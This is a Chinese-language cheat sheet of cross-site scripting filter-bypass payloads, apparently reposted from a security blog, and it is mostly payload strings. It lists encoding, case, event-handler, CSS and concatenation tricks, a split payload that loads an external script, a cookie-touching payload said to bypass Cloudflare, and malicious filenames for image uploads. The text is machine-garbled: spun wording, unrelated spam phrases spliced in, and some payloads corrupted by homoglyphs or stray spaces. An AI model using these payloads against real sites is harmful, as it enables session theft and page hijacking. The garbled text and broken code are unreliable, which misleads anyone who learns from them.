声名:本次测试只作为学惯用处松岛枫百度影音,请勿未授权进行浸透测试,切勿用于其它用途!公众号当今只对常读和星想法公众号才展示大图推送,提出公共把 明暗安全 设为星标,不然可能就看不到啦!
1.缺欠布景xss1. 前端过滤burp执包改包绕过
2. 双写绕过
<scri<script>pt>alert(111)</scri<script>pt>
3. 事件绕过如:onclick,onmousemove事件
onmouseover='alert('yyds')'
4. 大小写绕过<SCRIPT>aLeRT(111)</sCRIpt>
5. 禁绝骚扰绕过如:<scri<!--test--> pt> alert(1);</scr<!--test--> ipt>
6. 伪条约绕过如:111'> <a href='javascript:alert(document.domain)'>xss</a>
< table background= 'javascript:alert(/xss/)'> </table>
<img srC= 'javascript:alert('ss);' >
7. 空格回车Tab绕过空格:<img src= 'javascript:alert('xss');' >
TAB:< img src= 'javasc :ript:alert('ss');' >
回车:< img src= 'jav
ascript:
alert('xss');' >
8. 编码绕过1. base64编码:要是过滤了 < > ' ' script,不错用base64编码
eval(') eval函数把字符串 动作念规律推行atob函数是将base64密文退换为名文
'> <script> eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ== ));</script>
base64编码多用于如下两种情况:
1. <a href= '可控点'>
2. < iframe src= '可控点'>
例如:
<a href= 'data:text/html;base64,PGItZyBzcmM9eCBvbmVycm9yPWFsZXJOKDEpPg=='>test<
/a>
这么当test A贯穿点击时就会以data条约页面以html/text的格式领路编码为base64然后单点击
a贯穿时base64的编码就被复原成咱们底本的< img src=x οnerrοr= alert(1)>
2. JS编码:八进制:
三个八进制数字,要是个数不够,在前边补0,例如'e'的编码为'\145'
3. 十六进制:两个十六进制数字,要是个数不够,在前边补0,'e'的编码为'\x65'
十六进制前边加上\x不错被JS识别
尖括号被转义时,期骗十六进制绕过
如:\\x3cscript\\x3ealert(document.domain);\x3c/script\x3e
4. unicode:四个十六进制数字,要是个数不够,在前边补0,'e'的编码为'e'
十六进制前边加上\u00酿成JS可识别的Unicode编码
\alert(document.domain);\
关于一些范畴字符,使用非常的C类型的转义格调(例如\n和\r)
5. HTML实体编码:字符编码:十进制、十六进制编码,神气为'&#数值;',例如'<'不错编码为'<和'<'
<img src='x'οnerrοr= 'al&# 101;r 16;(1)'>
浏览器是不会在html|标签里领路js编码的,是以咱们在οnerrοr=背面放js中的编码是不会领路你放进去是什么即是什么
6. URL编码:进行两次URL全编码
<img src='x' onerror='eval(unescape('alert("xss");'))'>
Ascii码绕过<img src='x'
onerror='eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))'>
9. CSS绕过1. 期骗IE特质绕过XSS过滤:IE中两个反单引号hgj `` 不错闭合一个左边双引号
``οnmοusemοve= alert(1)
狼国色人网2. 期骗css特质绕过xss过滤:建设background:url,期骗JavaScript伪条约推行js,刻下唯有IE浏览器解救
background-color:# f00;background:url(javascript:alert(document.domain);');
低版块IE浏览器6 10 D版块弹窗奏效
3. IE中期骗CSS触发xss:CSS中的禁绝/**/
xss:expres/**/sion(if(!window.x){alert(document.domain);window.x= 1;})
10.过滤空格<html><imgAAsrcAAonerrorBB=BBalertCC(1)DD</html>
A位置可填充 /,/123/, , , , , B位置可填充 , , , , C位置可填充 ,/**/,要是加了双引号,则不错填充 , , , , D位置可填充 , , , , ,//,>
11.字符拼接期骗eval<img src='x' onerror='a=`aler`;b=`t`;c='(`xss`);';eval(a b c)'>
期骗top<img src='x' onerror='top['al' 'ert'](1)'>
期骗window<img src='x' onerror='window['al' 'ert'](1)'>
期骗self<img src='x' onerror='self[`al` `ert`](1)'>
期骗parent<img src='x' onerror='parent[`al` `ert`](1)'>
期骗frames<img src='x' onerror='frames[`al` `ert`](1)'>
12.其它字符沾污<<script>alert('xss');//<</script>
<title><img src=</title>><img src=x onerror='alert(`xss`);'> //因为title标签的优先级比img的高,是以会先闭合title,从而导致前边的img标签无效
<SCRIPT>var a='\\';alert('xss');//';</SCRIPT>
13.过滤双引号,单引号用反引号代替单双引号
<img src='x' onerror=alert(`xss`);>
14.过滤括号当括号被过滤的时期不错使用throw来绕过
<svg/onload='window.onerror=eval;throw'=alert\x281\x29';'>
15.alert 过滤prompt 替换<script>prompt(/xss/)</script>
confirm 替换<script>confirm(/xss/)</script>
console.log 替换<script>console.log(3)</script>
document.write 替换<script>document.write(1)</script>
base64 绕过<img src=x onerror='Function`a${atob`YWxlcnQoMSk=`}```'>
<img src=x
onerror='``.constructor.constructor`a${atob`YWxlcnQoMSk=`}```'>
16.常用函数<img src='x' onerror='eval(alert(1))'>
<img src='x' onerror='open(alert(1))'>
<img src='x' onerror='document.write(alert(1))'>
<img src='x' onerror='setTimeout(alert(1))'>
<img src='x' onerror='setInterval(alert(1))'>
<img src='x' onerror='Set.constructor(alert(1))'>
<img src='x' onerror='Map.constructor(alert(1))'>
<img src='x' onerror='Array.constructor(alert(1))'>
<img src='x' onerror='WeakSet.constructor(alert(1))'>
<img src='x' onerror='constructor.constructor(alert(1))'>
<img src='x' onerror='[1].map(alert(1))'>
<img src='x' onerror='[1].find(alert(1))'>
<img src='x' onerror='[1].every(alert(1))'>
<img src='x' onerror='[1].filter(alert(1))'>
<img src='x' onerror='[1].forEach(alert(1))'>
<img src='x' onerror='[1].findIndex(alert(1))'>
17.赋值拼接<img src onerror=_=alert,_(1)>
<img src x=al y=ert onerror=top[x y](1)>
<img src onerror=top[a='al',b='ev',b a]('alert(1)')>
<img src onerror=['ale' 'rt'].map(top['ev' 'al'])[0]['valu' 'eOf']()(1)>
18.拆分法当 Web 应用规律对辩论用户的输入长度进行了狂妄时,这时无法注入较长的xss挫折向量,关联词特定情况下,这种狂妄不错通过拆分法注入的格式进行绕过
<script>a='document.write(''</script>
<script>a=a '<script src=ht'</script>
<script>a=a 'tp://test.com/xs'</script>
<script>a=a 's.js></script>')'</script>
<script>eval(a)</script>
通过上头的拆分法不错拼集出底下竣工的挫折向量:
document.write('<script src = http://test.com/xss.js></script>')
19.上传文献构造xss上传平常文献改革文献名为xss语句
<script>alert(110)</script>.gif/png
20. XSS绕过cloudflarePayload:
<svg onload=alert(document.cookie)>
21. XSS绕过过滤Payload:
'/><svg svg svg//On OnLoAd=confirm(1)>
22. XSS(上传图片)<img src=x onerror=alert('XSS')>.png '>
<img src=x onerror=alert('XSS')>.png '>
<svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png
际遇不错上传图片而且不错自界说文献名的时期不错试试,这么上传以后当咱们探访这个图片的时期有可能就会触发xss了
原文贯穿:https://www.yuque.com/besilent/null/em256fm0kn5ofipl松岛枫百度影音
————————————————————— 本站仅提供存储工作,统共施行均由用户发布,如发现存害或侵权施行,请点击举报。